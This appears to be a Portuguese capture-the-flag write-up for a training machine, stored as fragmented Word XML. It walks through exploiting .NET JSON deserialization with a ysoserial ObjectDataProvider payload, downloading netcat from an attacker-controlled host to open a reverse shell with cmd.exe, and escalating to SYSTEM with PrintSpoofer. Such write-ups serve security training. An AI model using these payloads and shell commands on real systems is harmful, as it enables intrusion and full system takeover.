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odyetaqudbjk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7mmvp5dxrops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Montagne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6sxwimz6yu7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executado um scan com o Nmap para identificar quais portas estavam abertas no host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06800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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varredura, identificamos que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 e 3389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estavam acessíveis no host. Ao acessar a aplicação por meio da porta 80, foi possível visualizar a interface disponibilizada pelo serviço web.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página inicial, preenchemos os campos solicitados com o nome e o endereço de e-mail.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21000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Interceptamos essa requisição utilizando o proxy do Burp Suite. E identificamos que essas informações são transmitidas em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25400" l="25400" r="25400" t="2540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identificar que os dados eram enviados em formato JSON, avaliamos se a aplicação poderia estar vulnerável a uma deserialização insegura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.NET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utilizamos o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ysoserial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ferramenta de geração de payloads.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ysoserial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geramos um payload especificamente estruturado para executar um comando no sistema operacional — neste caso, uma chamada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no Windows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— visando validar a possibilidade de execução remota de comandos por meio da vulnerabilidade.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.\ysoserial.exe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ObjectDataProvider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--jsonpretty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ysoserial gerou o payload em formato JSON utilizando aspas simples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(')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que a requisição fosse interpretada corretamente pela aplicação, ajustamos manualmente o conteúdo substituindo-as por aspas duplas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(")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"System.Windows.Data.ObjectDataProvider,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PublicKeyToken=31bf3856ad364e35",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"MethodParameters":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"System.Collections.ArrayList,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mscorlib,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PublicKeyToken=b77a5c561934e089",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"$values":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&lt;ip-vpn&gt;"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"ObjectInstance":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"System.Diagnostics.Process,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PublicKeyToken=b77a5c561934e089"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08200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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exploração da desserialização insegura, foi possível confirmar a vulnerabilidade ao observar que a aplicação executou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direcionado ao nosso IP, evidenciando a execução remota do payload enviado.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82600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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n9r1w7hqte5p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certeza de execução remota, foi iniciada a fase de pós-exploração, onde optou-se por estabelecer uma sessão interativa. Para isso, foi transferido para o servidor um binário </w:t>
      </w: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nc (Netcat)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curl a partir de um servidor controlado pelo atacante. Em seguida, o binário foi acionado para iniciar uma reverse shell, garantindo acesso interativo ao sistema comprometido com o contexto de execução da aplicação vulnerável.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"System.Windows.Data.ObjectDataProvider,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PresentationFramework,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PublicKeyToken=31bf3856ad364e35",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"MethodParameters":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"System.Collections.ArrayList,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mscorlib,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PublicKeyToken=b77a5c561934e089",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"$values":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"cmd",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&lt;ip-vpn&gt;/nc64.exe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"ObjectInstance":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"System.Diagnostics.Process,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Version=4.0.0.0,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Culture=neutral,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PublicKeyToken=b77a5c561934e089"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o download do binário para a máquina alvo com sucesso,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bastou executar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previamente transferido para a máquina alvo, utilizando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 -e cmd.exe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opção redireciona a entrada e saída do terminal diretamente para o servidor do atacante.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&lt;ip-vpn&gt;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resultado, foi estabelecida com sucesso uma sessão de reverse shell totalmente interativa, permitindo controlar remotamente o sistema comprometido a partir do console do atacante.</w:t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ijj29sf4rwb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6C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whoami /priv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listar todos os privilégios associados ao usuário atualmente em execução no Windows. Essa informação permite avaliar o nível de permissões disponível, identificando se existem privilégios que podem ser explorados para elevar o acesso dentro do sistema.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Constatamos que o usuário possui o privilégio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habilitado . Esse privilégio é altamente sensível em ambientes Windows, pois permite que o processo atual assuma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 token de segurança de outro processo com privilégios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superiores, caso seja possível capturar ou manipular um token autenticado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074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elevação de privilégio a partir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utilizamos o binário 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PrintSpoofer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uma ferramenta desenvolvida para explorar falhas de token impersonation em serviços de impressão do Windows.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hyperlink r:id="rId2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PrintSpoofer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faz uso do privilégio disponível para capturar e impersonar o token de um processo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executar um comando arbitrário com privilégio máximo.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o download do binário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PrintSpoofer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máquina alvo, utilizando a própria reverse shell ativa.</w:t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&lt;ip-vpn&gt;/PrintSpoofer64.exe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PrintSpoofer64.exe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4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binário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PrintSpoofer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já presente na máquina, ele foi executado diretamente a partir da reverse shell. A execução lançou um novo processo com privilégios elevados, permitindo obter um shell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 (NT AUTHORITY\SYSTEM)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assim, assumir controle total do sistema Windows comprometido.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PrintSpoofer64.exe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41400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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estava localizada dentro do diretório do usuário Administrator, acessível após a obtenção de privilégios elevados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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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estava localizada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C:\Users\mssql-svc\Desktop.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30500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.uahhc9dq855i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0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9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Montagne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2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7.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itm4n/PrintSpoofer?tab=readme-ov-file" TargetMode="Externa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yperlink" Target="https://github.com/itm4n/PrintSpoofer?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itm4n/PrintSpoofer?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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app.hackingclub.com/training/training-machines/289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0.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwntester/ysoserial.net" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml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hyperlink" Target="https://github.com/int0x33/nc.exe/blob/master/nc64.ex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G6SQYoioILMuXuwmQYMf+socGg==">CgMxLjAyDmgub2R5ZXRhcXVkYmprMg5oLjdtbXZwNWR4cm9wczINaC42c3h3aW16Nnl1NzIOaC5uOXIxdzdocXRlNXAyDmguZmlqajI5c2Y0cndiMg5oLnVhaGhjOWRxODU1aTgAciExdjBDM1lBZGNuWGU1Ti1XeWEzR1NJYVJTTG00NmN4dTA=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